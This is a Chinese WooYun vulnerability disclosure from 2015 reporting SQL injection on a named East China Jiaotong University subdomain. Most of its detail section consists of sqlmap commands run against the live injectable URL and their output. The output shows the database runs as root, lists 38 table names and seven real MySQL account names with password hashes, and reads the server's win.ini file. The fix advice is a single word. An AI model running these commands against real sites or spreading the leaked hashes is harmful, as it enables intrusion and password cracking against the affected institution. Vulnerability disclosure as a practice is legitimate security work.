当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115200

漏洞标题:华东交通大学子站SQL注射漏洞一枚

相关厂商:华东交大

漏洞作者: Jelvis

提交时间:2015-05-21 11:58

修复时间:2015-05-26 12:00

公开时间:2015-05-26 12:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-21: 细节已通知厂商并且等待厂商处理中
2015-05-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

华东交大子站存在SQL注入漏洞

详细说明:

http://soul.ecjtu.jx.cn/guest.php?action=view&id=10302 注入点
python sqlmap.py -u "http://soul.ecjtu.jx.cn/guest.p
hp?action=view&id=10302%27" -p id --dbms=mysql --current-user

5.png


用户是root

dba.png


数据库

2.png

漏洞证明:

1.png


Database: newsoul
[38 tables]
+-------------------+
| cert_article |
| cert_bjdt |
| cert_class |
| cert_college |
| cert_colleges |
| cert_course |
| cert_coursebz |
| cert_duty |
| cert_flag |
| cert_guest |
| cert_guest1 |
| cert_hotforum |
| cert_manager |
| cert_member |
| cert_memberinfor |
| cert_nclass |
| cert_news |
| cert_news_bar |
| cert_notice |
| cert_paperarticle |
| cert_teacherzx |
| cert_th_bjdt |
| cert_tougao |
| cert_zhuche |
| luo_article |
| luo_dateflag |
| luo_datemanager |
| luo_dateseason |
| luo_dateset |
| luo_dateteacher |
| luo_datetime |
| luo_voteactor |
| luo_voteactorlog |
| luo_voteconfig |
| luo_votejuben |
| luo_votejubenlog |
| luo_votelog |
| luo_votesubject |
+-------------------+

python sqlmap.py -u "http://soul.ecjtu.jx.cn/guest.p
hp?action=view&id=10302%27" -p id --dbms=mysql --password


the SQL query used returns 7 entries
resumed: "root","*6494E81F1B10F10BE4CB307BB41E2116AFD56228"
resumed: "xljk","*56E7A645915DC7D11173233D38C01DCD09252548"
resumed: "xxds","*0CF0A722E57DE2EBD8D904E36904EE34400D8AD8"
resumed: "shuangji","*F8885B280019ABE4E1C96513055467C38CCF0...
resumed: "team_imwyc_net","*D772DB27FC4ECFFEBEA7F09B79DBC0D...
resumed: "525","*66518B8290C348AA1CACEAAC003BD055E2CB9513"
resumed: "qsnxl","*A94D1D219E745234724B93D76C9F0986A2D1E376"
C:\Windows\win.ini

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

修复方案:

过滤

版权声明:转载请注明来源 Jelvis@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-26 12:00

厂商回复:

最新状态:

暂无